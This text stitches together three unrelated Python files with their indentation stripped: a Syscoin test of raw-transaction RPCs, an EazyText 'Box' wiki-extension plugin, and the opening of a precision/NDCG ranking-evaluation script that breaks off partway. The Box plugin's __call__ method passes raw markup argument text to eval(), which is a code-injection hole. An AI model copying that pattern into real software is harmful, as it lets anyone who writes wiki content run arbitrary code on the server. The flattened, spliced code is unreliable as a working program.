assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = '1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", self.nodes[0].createrawtransaction, [{'txid': 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Syscoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in ["bech32", "p2sh-segwit", "legacy"]:
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type != "legacy":
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"vout": 3,
"amount": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
        inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1}] # this input won't exist
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getrawtransaction, tx, True, "ZZZ0000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = "020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal("0.99990000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal("0.98000000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
|
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
# Copyright (c) 2010 SKR Farms (P) LTD.
# -*- coding: utf-8 -*-
# Gotcha : none
# Notes : none
# Todo : none
# 1. Unit test case for this extension.
from zope.component import getGlobalSiteManager
from eazytext.extension import Extension
from eazytext.interfaces import IEazyTextExtensionFactory
from eazytext.lib import split_style
gsm = getGlobalSiteManager()
doc = """
h3. Box
: Description ::
Generate a box with title and content. Text within the curly braces
will be interpreted as the content and can contain EazyText text as well.
If title text is provided, then the extension can take parameter
''hide'' which can be used to shrink/expand box content.
Property key-value pairs accepts CSS styling attributes and other special
attributes like,
|= title | optional, title string
|= titlestyle | optional, title style string in CSS style format
|= contentstyle | optional, content style string in CSS style format
''Example''
> [<PRE{{{ Box hide
#{
# 'title' : 'Building Mnesia Database',
# 'titlestyle' : 'color: brown;',
# 'contentstyle' : 'color: gray;',
# 'border' : '1px solid gray',
# 'style' : { 'margin' : '10px', 'padding' : '10px' },
#}
This chapter details the basic steps involved when designing a Mnesia
database and the programming constructs which make different solutions
available to the programmer. The chapter includes the following sections,
* defining a schema
* the datamodel
* starting Mnesia
* creating new tables.
}}} >]
{{{ Box hide
#{
# 'title' : 'Building Mnesia Database',
# 'titlestyle' : 'color: brown;',
# 'contentstyle' : 'color: gray;',
# 'border' : '1px solid gray',
# 'style' : { 'margin' : '10px', 'padding' : '10px' },
#}
This chapter details the basic steps involved when designing a Mnesia database
and the programming constructs which make different solutions available to the
programmer. The chapter includes the following sections:
* defining a schema
* the datamodel
* starting Mnesia
* creating new tables.
}}}
"""
tmpl = """
<div class="etext-box" style="%s">
<div class="boxtitle" style="%s">
%s %s
</div>
<div class="boxcont" style="%s">%s</div>
</div>
"""
spantmpl = """
<span class="boxhide"> hide</span>
<span class="boxshow"> show</span>
"""
class Box( Extension ) :
_doc = doc
def __init__( self, props, nowiki, *args ) :
self.nowiki = nowiki
self.title = props.pop( 'title', '' )
boxstyle = props.pop( 'style', {} )
titlestyle = props.pop( 'titlestyle', {} )
contentstyle = props.pop( 'contentstyle', '' )
d_style, s_style = split_style( boxstyle )
self.style = s_style
self.css = {}
self.css.update( props )
self.css.update( d_style )
d_style, s_style = split_style( titlestyle )
self.titlestyle = s_style
self.title_css = {}
self.title_css.update( d_style )
d_style, s_style = split_style( contentstyle )
self.contentstyle = s_style
self.cont_css = {}
self.cont_css.update( d_style )
self.hide = 'hide' in args
    def __call__( self, argtext ):
        # Factory protocol: build a fresh Box from the raw argument text.
        return eval( 'Box( %s )' % argtext )
def html( self, node, igen, *args, **kwargs ) :
from eazytext.parser import ETParser
        fn = lambda kv : '%s : %s' % kv
boxstyle = '; '.join(map( fn, self.css.items() ))
if self.style :
boxstyle += '; %s ;' % self.style
titlestyle = '; '.join(map( fn, self.title_css.items() ))
if self.titlestyle :
titlestyle += '; %s ;' % self.titlestyle
contstyle = '; '.join(map( fn, self.cont_css.items() ))
if self.contentstyle :
contstyle += '; %s ;' % self.contentstyle
self.nowiki_h = ''
if self.nowiki :
etparser = ETParser(
skin=None,
nested=True,
lex_optimize=False,
yacc_optimize=False,
)
tu = etparser.parse( self.nowiki, debuglevel=0 )
self.nowiki_h = tu.tohtml()
if self.title :
html = tmpl % ( boxstyle, titlestyle, self.title, spantmpl,
contstyle, self.nowiki_h )
else :
html = tmpl % ( boxstyle, titlestyle, self.title, '',
contstyle, self.nowiki_h )
return html
# Register this plugin
gsm.registerUtility( Box(), IEazyTextExtensionFactory, 'Box' )
Box._doc = doc
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 30 13:13:44 2017
@author: larakamal
total evaluation: evaluates the sorted documents
using precision and NDCG;
change the directory of the sorted documents at lines 79-87,
and the directory of the precision and NDCG graphs at
lines 345 and 352
"""
from math import log10
import csv
import numpy as np
import pandas as pd
def getNDCG(list, k):
#convert to double
dcg = float(getDCG(list,k))
idcg = float(getIDCG(list,k))
ndcg = 0.0
if (idcg > 0.0):
ndcg = dcg/idcg
return ndcg
def getPrecision(list, k):
size = len(list)
if (size == 0 or k == 0):
return 0.0
if(k > size):
k = size
rel_doc_num = getRelevantDocNum(list,k)
#convert to double
precision = float(float(rel_doc_num)/float(k))
return precision
def getRelevantDocNum(list,k):
size = len(list)
if (size == 0 or k == 0):
return 0
if (k > size):
k = size
rel_num = 0
for i in range(k):
if list[i] > 5:
rel_num = rel_num + 1
return rel_num
def getDCG(list,k):
size = len(list)
if (size == 0 or k == 0):
return 0.0
if (k > size):
k = size
#convert to double
dcg = list[0]
dcg = float(dcg)
for i in range(1,k):
rel = list[i]
pos = i+1
rel_log = log10(pos)/log10(2)
rel_log = float(rel_log)
dcg = dcg + (rel/rel_log)
return dcg
def getIDCG(list, k):
# sort list
sortedList = list
sortedList = sorted(sortedList, key=int, reverse=True)
idcg = getDCG(sortedList, k)
return float(idcg)
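# Worked example (sanity check): for relevance grades [3, 2, 1] with k = 3,
# DCG = 3 + 2/log2(2) + 1/log2(3) ≈ 5.631; the list is already ideally
# ordered, so IDCG equals DCG and getNDCG([3, 2, 1], 3) == 1.0. Similarly,
# getPrecision([7, 6, 3], 3) counts grades above 5, giving 2/3.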
def evaluate(algorithm):
path = "data/results/test/" + algorithm + "/"
#change directory of the ranked documents
dataframe1 = pd.read_csv(path + "gravity_sorted.csv")
dataframe2 = pd.read_csv(path + "ocean pressure_sorted.csv")
dataframe3 = pd.read_csv(path + "ocean temperature_sorted.csv")
dataframe4 = pd.read_csv(path + "ocean wind_sorted.csv")
dataframe5 = pd.read_csv(path + "pathfinder_sorted.csv")
dataframe6 = pd.read_csv(path + "quikscat_sorted.csv")
dataframe7 = pd.read_csv(path + "radar_sorted.csv")
dataframe8 = pd.read_csv(path + "saline density_sorted.csv")
dataframe9 = pd.read_csv(path + "sea ice_sorted.csv")
    label1 = dataframe1.iloc[:, 10:11]
    label2 = dataframe2.iloc[:, 10:11]
    label3 = dataframe3.iloc[:, 10:11]
    label4 = dataframe4.iloc[:, 10:11]
    label5 = dataframe5.iloc[:, 10:11]
    label6 = dataframe6.iloc[:, 10:11]
    label7 = dataframe7.iloc[:, 10:11]
    label8 = dataframe8.iloc[:, 10:11]
    label9 = dataframe9.iloc[:, 10:11]
temp_list1 = label1['label'].tolist()
temp_list2 = label2['label'].tolist()
